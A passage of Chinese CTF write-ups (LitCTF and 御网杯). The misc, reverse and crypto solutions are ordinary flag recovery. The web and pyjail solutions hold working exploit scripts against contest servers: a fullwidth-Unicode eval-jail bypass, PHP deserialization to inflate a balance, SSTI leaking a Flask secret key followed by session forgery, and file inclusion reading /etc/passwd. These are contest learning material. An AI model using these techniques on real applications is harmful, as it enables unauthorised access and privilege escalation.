from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from itertools import product

KEY_PREFIX = b"LitCTF2026!!!"
c = b"\x0c\xdb'`\xc91\xf7\x05\x91+\x0fM\xed\xbc\x9b\xf1\xd8D\xcd\xfd" \
    b"\x0c\xb9\xb6\xb2J<\x86\x19\x06K\xb3\xa2\xa4\x18\x87<" \
    b"v\xac\x1bbu#\xaa\xb5I\x7f\xd8\xd3"

for s in product(range(256), repeat=3):
    key = KEY_PREFIX + bytes(s)
    pt = AES.new(key, AES.MODE_ECB).decrypt(c)
    try:
        flag = unpad(pt, 16)
    except ValueError:
        continue
    if all(32 <= b < 127 for b in flag):
        print(f"suffix = {bytes(s)!r}")
        print(f"flag   = {flag.decode()}")
        break

litctf{aes_tiny_brut3_for_the_win!}

Misc

lit_lsb_base64

题目提示是LSB隐写，直接扔进随波逐流

base64解码

拿到flag

LitCTF{lsb_1s_fun_w1th_b4s3_64}

lit_rush_qr

附件给了一个gif，我们可以用iloveimg这个网站把gif转为图片

可以发现二维码缺少定位符，依旧随波逐流

补全三个定位角之后即可识别

得到

LitCTF{qr_h1gh_3rr_c0r_r3c0v3ry}

lit_welcome

依旧拖进随波逐流

lsb分析

拿到flag

LitCTF{w3lc0m3_t0_m1sc_w0rld}

lit_sstv

直接用在线网站解sstv

https://sstv-decoder.mathieurenaud.fr/

拿到flag

LitCTF{sstv_p4t13nc3}

lit_pyjail_reader

题目原件

#!/usr/bin/env python3
"""LitCTF — 入门 Pyjail：验证码 + 按指引两次只读文件（无 RCE）。"""

import secrets
import socket
import string
import threading

HOST = "0.0.0.0"
PORT = 9999
MAX_QUEUED = 64
MAX_LINE = 512
MAX_FILE = 4096


def recv_line(conn: socket.socket) -> str:
    data = bytearray()
    while len(data) < MAX_LINE:
        chunk = conn.recv(1)
        if not chunk:
            break
        if chunk == b"\n":
            break
        data += chunk
    return data.decode("utf-8", errors="replace").strip()


def safe_read(path: str) -> str:
    p = path.strip()
    if not p or p.startswith("-") or "\x00" in p:
        raise ValueError("invalid path")
    with open(p, "r", errors="replace") as f:
        return f.read(MAX_FILE)


def handle(conn: socket.socket) -> None:
    try:
        conn.settimeout(120)
        alphabet = string.ascii_uppercase
        challenge = "".join(secrets.choice(alphabet) for _ in range(8))
        conn.sendall(
            f"Please enter the reverse of '{challenge}' to continue: ".encode()
        )
        ans = recv_line(conn)
        if ans != challenge[::-1]:
            conn.sendall(b"Wrong reverse string. Bye.\n")
            return
        conn.sendall(
            b"Good.\n"
            b"Step 1: read /app/where_is_flag.txt (it contains the flag path).\n"
            b"Step 2: read that path.\n"
            b"File path (1/2): "
        )
        p1 = recv_line(conn)
        try:
            c1 = safe_read(p1)
        except Exception as e:
            conn.sendall(f"Error: {e}\n".encode(errors="replace"))
            return
        conn.sendall(b"--- begin ---\n")
        conn.sendall(c1.encode(errors="replace"))
        conn.sendall(b"\n--- end ---\nFile path (2/2): ")
        p2 = recv_line(conn)
        try:
            c2 = safe_read(p2)
        except Exception as e:
            conn.sendall(f"Error: {e}\n".encode(errors="replace"))
            return
        conn.sendall(c2.encode(errors="replace"))
        conn.sendall(b"\n")
    finally:
        conn.close()


def main() -> None:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen(MAX_QUEUED)
    while True:
        client, _ = srv.accept()
        threading.Thread(target=handle, args=(client,), daemon=True).start()


if __name__ == "__main__":
    main()

对题目原件分析后

整道题不需要任何绕过，完全按照服务器的 Step1 / Step2 顺序走即可。脚本主要负责：

接收 banner，正则提取 8 字母 challenge
反转后送回
发送 /app/where\_is\_flag\.txt
解析 \-\-\- begin \-\-\- \.\.\. \-\-\- end \-\-\- 之间的内容拿到真实路径
把这个路径再发回去，收最后输出

经典的新手引导型交互题

流程：

反转验证码

读取： /app/where_is_flag.txt

得到真正 flag 路径

第二次读取那个路径

拿 flag

flag{sisx9chi-ciik-4cd-81xr-vcfrxt7frexgh}

lit_pyjail_unicode

原件

#!/usr/bin/env python3
"""LitCTF — Unicode 标识符绕过：过滤检查原始源码字符串，解释器仍接受全角等价标识符。"""

import re
import socket
import threading

HOST = "0.0.0.0"
PORT = 9999
MAX_QUEUED = 64
MAX_LINE = 240

# 仅检查「你键入的文本」：ASCII 关键字用词边界，避免匹配到 important 等
BANNED = re.compile(
    r"\bimport\b|\bexec\b|\beval\b|\bopen\b|\bcompile\b|\bglobals\b|\blocals\b|__|"
    r"\bgetattr\b|\bsetattr\b|\bdelattr\b|\bvars\b|\bbreakpoint\b|\binput\b|"
    r"\bsubprocess\b|\bpty\b|os.|sys.|\bposix\b",
    re.IGNORECASE,
)


def banned(raw: str) -> bool:
    if "\\u" in raw or "\\U" in raw or "\\x" in raw:
        return True
    return BANNED.search(raw) is not None


def handle(conn: socket.socket) -> None:
    try:
        conn.settimeout(60)
        conn.sendall(
            b"=== LitCTF pyjail unicode ===\n"
            b"Send ONE line of Python. It will be eval() with full __builtins__.\n"
            b"ASCII blacklist applies to your *source text* (see attachment jail.py).\n"
            b"Goal: read /flag and get its str content.\n> "
        )
        raw = bytearray()
        while len(raw) < MAX_LINE:
            ch = conn.recv(1)
            if not ch:
                break
            if ch == b"\n":
                break
            raw += ch
        line = raw.decode("utf-8", errors="replace").strip()
        if not line:
            conn.sendall(b"empty\n")
            return
        if banned(line):
            conn.sendall(b"disallowed pattern in source\n")
            return
        try:
            out = eval(line, {"__builtins__": __builtins__})
            conn.sendall(repr(out).encode(errors="replace") + b"\n")
        except Exception as e:
            conn.sendall(f"{type(e).__name__}: {e}\n".encode(errors="replace"))
    finally:
        conn.close()


def main() -> None:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen(MAX_QUEUED)
    while True:
        c, _ = srv.accept()
        threading.Thread(target=handle, args=(c,), daemon=True).start()


if __name__ == "__main__":
    main()

题目给了一个 Python pyjail，并提示：

Send ONE line of Python. It will be eval() with full __builtins__.
ASCII blacklist applies to your source text.
Goal: read /flag

源码关键部分：

BANNED = re.compile(
    r"\bimport\b|\bexec\b|\beval\b|\bopen\b|..."
)

if banned(line):
    conn.sendall(b"disallowed pattern in source\n")
    return

out = eval(line, {"__builtins__": __builtins__})

可以看到：

黑名单只检查「原始输入字符串」
但 eval 使用完整 builtins
并没有真正删除 open

题目名是 unicode，因此考虑 Unicode 标识符绕过。

一句话总结

黑名单看的是字节，解析器看的是 NFKC 归一化后的标识符——两者认知不一致就是这道题的洞。把 open 写成全角 ｏｐｅｎ，正则一无所知，编译器照常解析为内置 open，eval 一行 ｏｐｅｎ$\&\#39;/flag\&\#39;$\.read 收工。

用全角字符绕过

import socket

HOST = "challenge.cyclens.tech"
PORT = 32326

s = socket.socket()
s.connect((HOST, PORT))

print(s.recv(4096).decode())

payload = "ｏｐｅｎ('/flag').read()\n"

s.send(payload.encode())

print(s.recv(4096).decode())

s.close()

御网杯 WriteUp

Mon, 01 Jun 2026 00:00:00 GMT

御网杯

Web

WEB-Snake_Game

题目截图

解题思路

打开首页后，页面只有一个 Snake Game，前端逻辑全写在页面内联 JavaScript 里。关键点在这个函数：

function checkWin(s) {
    let formData = new FormData();
    formData.append('score', s);
    fetch('index.php', { method: 'POST', body: formData })
    .then(r => r.json())
    .then(data => {
        if(data.status === 'success') {
            msgEl.innerText = data.flag;
        }
    });
}

可以看到：

游戏结束后，前端只是把 score 提交给 index.php
服务端返回 JSON
前端直接把返回的 flag 显示出来

这说明核心漏洞是：后端只校验提交的分数，没有校验分数是否真的通过游戏产生

利用方式

直接伪造一个 score=300 的请求即可，然后拿到flag。

WEB-PHP_Payment

题目截图

解题思路

先审附件源码，关键点有两处。

在 apply_coupon.php 中，服务端会对用户提交的 coupon 参数先做 base64_decode()，随后直接执行 unserialize()：

$decoded = base64_decode($couponData);
$promo = @unserialize($decoded);

这意味着这里存在用户可控的 PHP 反序列化。

在 models.php 中定义了 PromoManager 类，它的析构函数会把对象属性 promo_credit 直接累加到 session 余额：

function __destruct() {
    if(isset($this->promo_credit) && is_numeric($this->promo_credit)) {
        $_SESSION['balance'] += intval($this->promo_credit);
    }
}

也就是说，只要我们伪造一个 PromoManager 对象，并把 promo_credit 设成足够大的数字，在反序列化结束、对象销毁时就能给自己“充值”。

再看 buy.php，其中 flag 商品价格是 99999 金币：

初始余额只有 20，因此正常无法购买，但通过优惠券反序列化可以直接把余额加到足够大。

利用链非常简单：

访问首页，拿到一个新的 PHPSESSID
构造 PromoManager 对象，令 promo_credit=100000
将该对象序列化后再 Base64 编码，作为 coupon 提交给 /api/apply_coupon.php
同一 session 下请求 /buy.php，传 item=flag
余额足够后成功购买，返回 flag

构造 Payload

PromoManager 有两个公开属性：

promo_credit
promo_code

因此可构造如下序列化字符串：

O:12:"PromoManager":2:{s:12:"promo_credit";i:100000;s:10:"promo_code";s:3:"VIP";}

对应 Base64 为：

TzoxMjoiUHJvbW9NYW5hZ2VyIjoyOntzOjEyOiJwcm9tb19jcmVkaXQiO2k6MTAwMDAwO3M6MTA6InByb21vX2NvZGUiO3M6MzoiVklQIjt9

用下面的脚本

from __future__ import print_function

import base64
import re
import sys

try:
    from urllib.request import HTTPCookieProcessor, Request, build_opener
    from urllib.parse import urlencode
    from http.cookiejar import CookieJar
except ImportError:
    from urllib2 import HTTPCookieProcessor, Request, build_opener
    from urllib import urlencode
    from cookielib import CookieJar

TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://120.27.146.76:13228"

def build_coupon(credit=100000, code="VIP"):
    payload = (
        'O:12:"PromoManager":2:{{'
        's:12:"promo_credit";i:{credit};'
        's:10:"promo_code";s:{code_len}:"{code}";'
        "}}"
    ).format(
        credit=credit,
        code_len=len(code),
        code=code,
    )
    return base64.b64encode(payload.encode()).decode()

def extract_flags(text):
    return re.findall(r"flag**\{**[^}]+**\}**", text)

def decode_text(data):
    if hasattr(data, "decode"):
        return data.decode("utf-8", "ignore")
    return data

def http_get(opener, url):
    req = Request(url)
    return decode_text(opener.open(req, timeout=10).read())

def http_post(opener, url, data):
    body = urlencode(data)
    if hasattr(body, "encode"):
        body = body.encode("utf-8")
    req = Request(url, data=body)
    return decode_text(opener.open(req, timeout=10).read())

def main():
    jar = CookieJar()
    opener = build_opener(HTTPCookieProcessor(jar))

    http_get(opener, "{}/".format(TARGET))

    coupon = build_coupon()
    resp = http_post(
        opener,
        "{}/api/apply_coupon.php".format(TARGET),
        {"coupon": coupon},
    )
    print("[*] apply_coupon response:", resp)

    resp = http_post(
        opener,
        "{}/buy.php".format(TARGET),
        {"item": "flag"},
    )
    print("[*] buy response:", resp)

    flags = extract_flags(resp)
    if not flags:
        print("[-] No flag found.")
        return

    print("[+] Found flags:")
    for idx, flag in enumerate(flags, 1):
        print("  {}. {}".format(idx, flag))

    print("[+] Likely real flag: {}".format(flags[0]))

if __name__ == "__main__":
    main()

运行拿到flag

WEB-TaxSystem_SSTI

题目截图

解题思路

在 init_db.py 可以看到系统初始化了一个账号：

admin / 123456

在 app.py 的 preview() 逻辑里，只有当 state == 'AUDIT_PENDING' 时，才会走“官方审计报告”模板渲染分支。这个分支把 custom_footer 直接拼进 HTML，再交给 app.py (line 127) 的 render_template_string() 渲染，这就形成了标准 SSTI。

黑名单在 app.py ，虽然过滤了 __、引号、request、session 等关键字，但没有过滤 config，所以 {{config}} 可以直接用。

此外，app.py 的 /admin/vault 只校验：

if session.get('role') != 'tax_inspector':

也就是说，只要能伪造 Flask session，就能越权进后台。

要注意一点：config.py 里的默认 SECRET_KEY 不是远端实际值，所以不能直接拿源码默认值伪造 cookie，必须先通过 SSTI 泄露线上真实密钥。

接下来我们去利用

登录系统，账号密码为：

admin / 123456

通过 /api/import 修改自己的 profile：

{
  "profile_id": 1,
  "data": {
    "state": "AUDIT_PENDING",
    "custom_footer": "{{config}}"
  }
}

访问 /preview/1，页面会回显 Flask 配置，拿到远端真实密钥：

SECRET_KEY = secret_tax_key_2026_xoxo

用这个 SECRET_KEY 伪造 Flask session，把会话内容改成：

{"role": "tax_inspector", "user_id": 1}

带着伪造后的 session cookie 访问：

/admin/vault

可以用下面这个脚本

import re
import html
import requests
from flask import Flask
from flask.sessions import SecureCookieSessionInterface


BASE = "http://120.27.146.76:13583"
USERNAME = "admin"
PASSWORD = "123456"
PROFILE_ID = 1


def get_secret_key():
    s = requests.Session()

    r = s.post(
        BASE + "/login",
        data={"username": USERNAME, "password": PASSWORD},
        allow_redirects=True,
        timeout=10,
    )
    if r.status_code != 200:
        raise RuntimeError(f"login failed: {r.status_code}")

    r = s.post(
        BASE + "/api/import",
        json={
            "profile_id": PROFILE_ID,
            "data": {
                "state": "AUDIT_PENDING",
                "custom_footer": "{{config}}",
            },
        },
        timeout=10,
    )
    if r.status_code != 200:
        raise RuntimeError(f"import failed: {r.status_code} {r.text}")

    r = s.get(BASE + f"/preview/{PROFILE_ID}", timeout=10)
    text = html.unescape(r.text)

    m = re.search(r"SECRET_KEY': '([^']+)'", text)
    if not m:
        raise RuntimeError("SECRET_KEY not found in preview response")

    return m.group(1)


def forge_session(secret_key):
    app = Flask(__name__)
    app.secret_key = secret_key
    serializer = SecureCookieSessionInterface().get_signing_serializer(app)
    return serializer.dumps({"role": "tax_inspector", "user_id": 1})


def get_flag(cookie):
    s = requests.Session()
    s.cookies.set("session", cookie)

    r = s.get(BASE + "/admin/vault", timeout=10)
    if r.status_code != 200:
        raise RuntimeError(f"vault request failed: {r.status_code}")

    m = re.search(r'<div class="flag-box">\s*(.*?)\s*</div>', r.text, re.S)
    if not m:
        raise RuntimeError("flag not found in response")

    return m.group(1).strip()


def main():
    secret_key = get_secret_key()
    print(f"[+] SECRET_KEY: {secret_key}")

    cookie = forge_session(secret_key)
    print(f"[+] forged session: {cookie}")

    flag = get_flag(cookie)
    print(f"[+] flag: {flag}")


if __name__ == "__main__":
    main()

WEB-Enterprise_OA

题目截图

解题思路

访问首页可以看到导航链接使用了 module 参数：

/?module=public_notices.php
/?module=about.php
/?module=contact.php

说明页面内容很可能是通过 include 动态加载的，因此优先测试文件包含。

先尝试普通目录穿越：

/?module=../../etc/passwd

返回报错中可以看到，服务端实际尝试包含的是：

include(etc/passwd)

说明 \.\./ 被过滤掉了，继续读取首页源码：

/?module=php://filter/convert.base64-encode/resource=/var/www/html/index.php

解码后关键代码如下：

<?php
$module = isset($_GET['module']) ? $_GET['module'] : 'public_notices.php';
$module = str_replace('../', '', $module);
?>
...
<?php include($module); ?>

问题就在这里：开发者只替换了字符串 \.\./，但没有限制绝对路径。因此虽然相对路径穿越被“抹掉”了，绝对路径仍然可以直接包含系统文件。

验证任意文件读取

请求：

/?module=/etc/passwd

成功回显系统账户内容，证明绝对路径包含可用。

读取 flag

结合常见 CTF 文件位置，尝试直接读取：

/?module=/flag.txt

成功得到 flag。

Re

rerere

题目截图

解题思路

ida打开附件，主校验函数在sub_1400014FB

跳转过来

加密逻辑在sub_140001480

SBOX 可逆，直接对每个位置求逆即可：

input[i] = INV_SBOX[ EXPECTED[i] ] ^ XORKEY[i % 8]

关键数据

解题脚本

#!/usr/bin/env python3
expected = bytes.fromhex(
    "a3 5b 4c 0a 0e 98 84 da"
    "14 e7 0b 91 53 49 4f b6"
    "a9 ac 0b 49 14 97 4f d5"
    "b1 96 75 f6 3b a7 84 c5"
    "a9 c9 06 36 c6 6c".replace(" ", "")
)

xorkey = bytes.fromhex("b9 cd ce 30 b8 61 4e aa".replace(" ", ""))

sbox = bytes.fromhex("""
c2 23 97 49 83 f6 d3 a7 eb bf 78 c3 29 56 d2 1a
13 bc 21 6a 37 8e 5f 0c b4 46 de e4 6c a2 66 30
0f a4 bb 8c 09 4b 3d 32 42 55 2d 4f f9 77 1b 74
1f 71 7b 9d 73 c4 ab d0 f3 c1 88 07 dc ce ef c0
72 4a 27 81 9b ee c7 28 26 5a 94 54 70 d1 e9 c8
98 36 91 41 b8 3a 79 0a 08 e5 af 80 24 ae 00 19
cc 7a f7 51 7d 69 ec 03 65 25 1c 01 f5 e6 bd d9
59 fe 92 b0 10 6f f0 e3 9f ad 84 f4 a5 33 35 48
53 b1 e0 d8 05 38 18 68 a9 14 c6 3f 61 8a 31 3b
ba 2b 4e e2 57 9a f1 ea 64 7e a0 93 b6 da 60 2e
1d 5b 82 34 6d fc cf 7f e7 96 67 43 06 44 c9 4c
40 db fd 4d b5 ed 39 2c b3 17 9e cd fa 6b ca 87
8f 9c 89 0e 63 45 86 aa 5e 95 16 c5 d5 2f a1 f8
99 ff 3c 0d 3e d4 04 76 d7 47 20 8d df 5c 7c a3
1e 8b 15 b9 a8 cb 22 a6 52 d6 fb 5d dd b2 6e e8
f2 e1 2a 58 62 12 11 50 75 b7 ac 90 0b 85 02 be
""".replace("\n", "").replace(" ", ""))

assert len(set(sbox)) == 256, "SBOX 不是完整置换"

inv_sbox = [0] * 256
for i, v in enumerate(sbox):
    inv_sbox[v] = i

flag = bytes(inv_sbox[e] ^ xorkey[i % 8] for i, e in enumerate(expected))

for i, e in enumerate(expected):
    assert sbox[flag[i] ^ xorkey[i % 8]] == e

print(flag.decode())

flag{1470e2b8be617231cef8d657f4a1cba2}

字节码迷踪

题目截图

解题思路

py逆向，用die查看py版本是3.12

直接用在线网站反编译一下https://pylingual.io/

得到py源码

# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: 'temp_challenge.py'
# Bytecode version: 3.12.0rc2 (3531)
# Source timestamp: 2026-04-05 13:07:22 UTC (1775394442)

import base64
def decrypt_flag(encoded_data, key):
    decoded = base64.b64decode(encoded_data)
    return ''.join((chr(b ^ key) for b in decoded))
def main():
    encoded_flag = 'CAIPCRVeABgUC1wCX0NXHh1YQx4cBFZDBV1bC0MCWw9fHF5WXV8MBx4T'
    xor_key = 110
    user_input = input('请输入flag: ').strip()
    correct_flag = decrypt_flag(encoded_flag, xor_key)
    if user_input == correct_flag:
        print('正确！')
    else:
        print('错误！')
if __name__ == '__main__':
    main()

加解密对称(异或),直接拿密文跑一遍即可:

解题脚本

import base64

encoded_flag = 'CAIPCRVeABgUC1wCX0NXHh1YQx4cBFZDBV1bC0MCWw9fHF5WXV8MBx4T'
xor_key = 110

decoded = base64.b64decode(encoded_flag)
flag = ''.join(chr(b ^ xor_key) for b in decoded)
print(flag)

flag{0nvze2l1-9ps6-prj8-k35e-l5a1r0831bip}

ChaCha20

题目截图

解题思路

jadx打开后，直接跳转到mainactivity

验证按钮回调走这里

NativeBridge 注册了一堆 native 方法，但 MainActivity 只调了 c$String$，其它 ab/cd/dc 都是噪音。

libmyapplication\.so 没导出 Java\_…\_c 这种符号，是用 RegisterNatives 动态注册的。\.data\.rel\.ro 起头三个 12 字节的 JNINativeMethod 结构体：

解出三项：

name	signature	fnPtr
`a`	`$\[B$\[B`	`0x250b0`
`b`	`$\[B$\[B`	`0x251f0`
`c`	`$Ljava/lang/String;$Z`	`0x25330`

0x25330是目标函数

c 做 4 件事：

GetStringUTFChars 取出用户输入；
把输入字节当明文喂给「加密+hex」函数 sub\_25740，得到 out\_hex（小写十六进制字符串）；
把 out\_hex 一字节一字节和全局 g\_target（std::vector\<uint8\_t\>，地址 0x5a16c）比较；
完全相等返回 JNI\_TRUE，否则 JNI\_FALSE。

sub_276f0看反汇编是个mov $0x8, %eax; ret的「常量 8」，但它其实是一个 stub —— 真实的g_target.size()是把vector的_end - _begin拿出来再除以 1。比较循环每轮按0x40\-byte 块前进（外层 25803: cmp $0x40, %eax`），所以一轮匹配 64 字节（密文是 50 字符，刚好够用一轮）

c 的语义就是：hex$ChaCha20\(input$\) == \&\#34;d097c3f6d279df23af24ad35e9e08793831c8e2a22a1b2968b\&\#34;。

加密+hex 包装函数 `sub_25740`

key和nonce

取 key / nonce 的字节排布

内部一系列 call 27160（每次读一个 32-bit 小端 word），把 \.rodata 字节按 little-endian 拼成 state\[4\.\.11\]（key）和 state\[13\.\.15\]（nonce），state\[12\] = counter。这正好是 RFC 7539 ChaCha20 的状态布局。

hex字母表

sub_27530把每个密文字节b拆成两位：

ChaCha20 block 函数sub_26cc0

sub\_25740 在每轮里调一次 0x26cc0 生成 64 字节 keystream。这就是标准 ChaCha20 block：

sub_271a0就是 ChaCha20 的 quarter-round（add / xor / rotl 16/12/8/7）。10 次 double-round = 20 round。

目标密文：来自 `.init_array` 在运行时填充的全局 vector

sub_24be0是真正的填充逻辑：

解题脚本

#!/usr/bin/env python3

KEY = bytes.fromhex(
    "149263a16f2d89cbf0375b1ca94e78d3"
    "226017ee9abc4d0853e1762a8dc4903f"
)
NONCE = bytes.fromhex("44332211abcdef668899aa55")
CIPHERTEXT = bytes.fromhex(
    "d097c3f6d279df23af24ad35e9e08793831c8e2a22a1b2968b"
)
COUNTER = 1  # IETF ChaCha20 默认起始 counter

def rotl32(v, n):
    return ((v << n) & 0xFFFFFFFF) | (v >> (32 - n))

def quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] ^= s[a]; s[d] = rotl32(s[d], 16)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] ^= s[c]; s[b] = rotl32(s[b], 12)
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] ^= s[a]; s[d] = rotl32(s[d], 8)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] ^= s[c]; s[b] = rotl32(s[b], 7)

def u32le(b):
    return int.from_bytes(b, "little")

def chacha20_keystream(key, nonce, length, counter=1):
    assert len(key) == 32 and len(nonce) == 12
    out = bytearray()
    bc = counter
    consts = b"expand 32-byte k"
    while len(out) < length:
        state = (
            [u32le(consts[i:i + 4]) for i in range(0, 16, 4)]
            + [u32le(key[i:i + 4]) for i in range(0, 32, 4)]
            + [bc]
            + [u32le(nonce[i:i + 4]) for i in range(0, 12, 4)]
        )
        w = state[:]
        for _ in range(10):  # 20 rounds = 10 double-rounds
            quarter_round(w, 0, 4, 8, 12)
            quarter_round(w, 1, 5, 9, 13)
            quarter_round(w, 2, 6, 10, 14)
            quarter_round(w, 3, 7, 11, 15)
            quarter_round(w, 0, 5, 10, 15)
            quarter_round(w, 1, 6, 11, 12)
            quarter_round(w, 2, 7, 8, 13)
            quarter_round(w, 3, 4, 9, 14)
        for i, word in enumerate(w):
            out.extend(((word + state[i]) & 0xFFFFFFFF).to_bytes(4, "little"))
        bc = (bc + 1) & 0xFFFFFFFF
    return bytes(out[:length])

def chacha20_xor(key, nonce, data, counter=1):
    ks = chacha20_keystream(key, nonce, len(data), counter)
    return bytes(a ^ b for a, b in zip(data, ks))

def main():
    print(f"[+] key      : {KEY.hex()}")
    print(f"[+] nonce    : {NONCE.hex()}")
    print(f"[+] cipher   : {CIPHERTEXT.hex()}")
    print(f"[+] counter={COUNTER}")
    flag = chacha20_xor(KEY, NONCE, CIPHERTEXT, counter=COUNTER)
    try:
        print(f"[+] FLAG     : {flag.decode()}")
    except UnicodeDecodeError:
        print(f"[!] non-utf8 plaintext: {flag!r}")

if __name__ == "__main__":
    main()

flag{2023326077889096380}

DES加密验证

题目截图

解题思路

主 Activity:DEX 热加载

com\.cr\.crackme2\.MainActivity\.onCreate 调用了 b,关键步骤:

Native 库:

public static native boolean verifyFlag(String str);
static { System.loadLibrary("crackme2"); }

释放出的 wide Activity

assets/classes3\.dex 中的 com\.cr\.test\.wide 是真正承担 UI 校验的类:

private boolean callNativeMethod(String str) {
    Class<?> clazz = Class.forName("com.cr.crackme2.MainActivity");
    Method method = clazz.getMethod("verifyFlag", String.class);
    return (Boolean) method.invoke(null, str);
}

干扰类:com\.example\.demo\.\{MathUtils, LibraryBook, ShoppingCart, User, MainActivity, MainActivity2\} —— 都是与校验无关的样板类,用来扩大 jadx 输出迷惑分析人员。

去ida里面分析so文件

函数注册

// JNI_OnLoad → register_native_methods
RegisterNatives(env, FindClass("com/cr/crackme2/MainActivity"),
                {"verifyFlag", "(Ljava/lang/String;)Z", &verifyFlag}, 1);

verifyFlag** 反编译(关键)**

char verifyFlag(JNIEnv *env, jclass cls, jstring jstr) {
    const char *pcVar1 = env->GetStringUTFChars(jstr, NULL);
    int len_in        = strlen(pcVar1);

    size_t padded_len = 0;
    uchar *padded     = pkcs7_pad(pcVar1, len_in, &padded_len);   // FUN_00034490
    uchar *enc_buf    = malloc(padded_len);
    des_ecb_encrypt(padded, padded_len, (uchar*)"12345678", enc_buf);  // !!! 干扰

    std::string hex;
    bytesToHex(&hex, padded);                                      // 真正比较的源
    int got = std::string::data(&hex);

    char ok = 0;
    for (int i = 0; i < 1; i++) {
        if (std::string_eq(&DAT_00068060 + i*0xc, &hex)) {         // 与全局 EncryptedFlag 比较
            ok = 1; break;
        }
    }
    return ok;
}

注意几个反直觉的点:

DES 结果没被使用 —— `enc_buf` 仅 `free` 掉,从未参与比较。
`bytesToHex` 接受的是 PKCS#7 填充后的明文,不是密文。
比较使用 std::string::operator==(FUN\_00034560),即逐字节相等。
全局对象 DAT\_00068060(EncryptedFlag 类型)是 std::string,内容在构造函数里被静态初始化。

PKCS#7 填充函数`FUN_00034490`

void *pkcs7_pad(const void *src, int len, size_t *out_len) {
    int pad = 8 - len % 8;            // 即使整除也会再补 8 字节
    *out_len = len + pad;
    void *p = malloc(*out_len);
    memcpy(p, src, len);
    for (int i = len; i < *out_len; i++) ((char*)p)[i] = (char)pad;
    return p;
}

标准 PKCS#7,补到 8 字节倍数。

`EncryptedFlag` 全局对象的初始化

在 \.init\_array 调度的构造函数 FUN\_00033e40:

void __cxx_global_var_init() {
    std::string::string(&DAT_00068060,
        "666c61677b623532376532363231313331313334656332323235316366626361"
        "373565386339663561653466343133373138373166643535393131393237663636613162347d0202");
    __cxa_atexit(EncryptedFlag::~EncryptedFlag, ...);
}

解题脚本

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

CMP_TARGET_HEX = (
    "666c61677b623532376532363231313331313334656332323235316366626361"
    "373565386339663561653466343133373138373166643535393131393237663636613162347d0202"
)

def pkcs7_pad(data: bytes, block: int = 8) -> bytes:
    pad_len = block - (len(data) % block)
    return data + bytes([pad_len]) * pad_len

def pkcs7_unpad(data: bytes) -> bytes:
    pad_len = data[-1]
    if pad_len < 1 or pad_len > 8:
        raise ValueError(f"非法的 PKCS#7 填充长度: {pad_len}")
    if data[-pad_len:] != bytes([pad_len]) * pad_len:
        raise ValueError("PKCS#7 填充内容不一致")
    return data[:-pad_len]

def recover_flag() -> str:
    raw = bytes.fromhex(CMP_TARGET_HEX)
    return pkcs7_unpad(raw).decode("ascii")

def verify(flag: str) -> bool:

    padded_hex = pkcs7_pad(flag.encode("utf-8"), 8).hex()
    return padded_hex == CMP_TARGET_HEX

if __name__ == "__main__":
    flag = recover_flag()
    print(f"[+] 还原 flag: {flag}")
    print(f"[+] 长度    : {len(flag)}")

    ok = verify(flag)
    print(f"[+] 模拟校验: {'PASS' if ok else 'FAIL'}")
    assert ok, "回填校验失败,请检查 CMP_TARGET_HEX"

flag{b527e2621131134ec22251cfbca75e8c9f5ae4f41371871fd55911927f66a1b4}

Crypto

BabyRSA

题目截图

解题思路

题目给了两个附件

task.py

from Crypto.Util.number import bytes_to_long, getPrime
from secret import flag

m = bytes_to_long(flag)
e = 3

p = getPrime(512)
q = getPrime(512)
n = p * q

c = pow(m, e, n)

print(f"n = {n}")
print(f"e = {e}")
print(f"c = {c}")

out.text

n = 112236684276598445953470958979974248139305658317743482421936811887828282366740495598766025283574975379354653410041294383732249721913289160553784366226963636561141148428299310897822558962407745549801741467690656825961511511191360890527802201275378106451269606406534901848399667333669874060639983305991244441419
e = 3
c = 2217344750798591625447833487696320861775115646060744565481810923840358354823011100363343264521780315972663215185875986580406759972170037422918646653524839131172834345312234369524761802337273644307475982202699180835279895013740317857205387940896435849998551522519951199597669

经典 RSA 小指数（e = 3）题型。先看看 n 和 c 的位数关系：

值	比特长度
`n`	1024
`c`	909

也就是 c \< n。这暗示 m^3 在没有取模的情况下就已经小于 n，于是

直接对 c 开三次方就能拿到 m，无需分解 n。

解题脚本

import gmpy2
from Crypto.Util.number import long_to_bytes

n = 112236684276598445953470958979974248139305658317743482421936811887828282366740495598766025283574975379354653410041294383732249721913289160553784366226963636561141148428299310897822558962407745549801741467690656825961511511191360890527802201275378106451269606406534901848399667333669874060639983305991244441419
e = 3
c = 2217344750798591625447833487696320861775115646060744565481810923840358354823011100363343264521780315972663215185875986580406759972170037422918646653524839131172834345312234369524761802337273644307475982202699180835279895013740317857205387940896435849998551522519951199597669

m, exact = gmpy2.iroot(c, e)
assert exact
print(long_to_bytes(int(m)).decode())

flag{769cc0209669698952823747f21eb10e}

ScatterRSA

题目截图

解题思路

题目给了两个附件

task.py

from secret import flag
from Crypto.Util.number import *
import random

m = bytes_to_long(flag)
e = 3

print(f"e = {e}")

for i in range(3):
    p = getPrime(512)
    q = getPrime(512)
    n = p * q
    a = random.getrandbits(128) | (1 << 127)
    b = random.getrandbits(256) | (1 << 255)
    c = pow(a * m + b, e, n)

    print(f"n{i+1} = {n}")
    print(f"a{i+1} = {a}")
    print(f"b{i+1} = {b}")
    print(f"c{i+1} = {c}")

out.text

e = 3
n1 = 134590028715846226751903719587861090472772080921099504036178613989523328571021119450984313988905557385036821505121612368860436253713267192159612607745301358472400758433053304358101099945515440169672493726615122471822947908806960237079424527450364377187388434878044214423874958715687632702618242260038201552961
a1 = 173235201602700035769143714622479214858
b1 = 58616053309986169433995951615552358657183395855412447208282770965760612937595
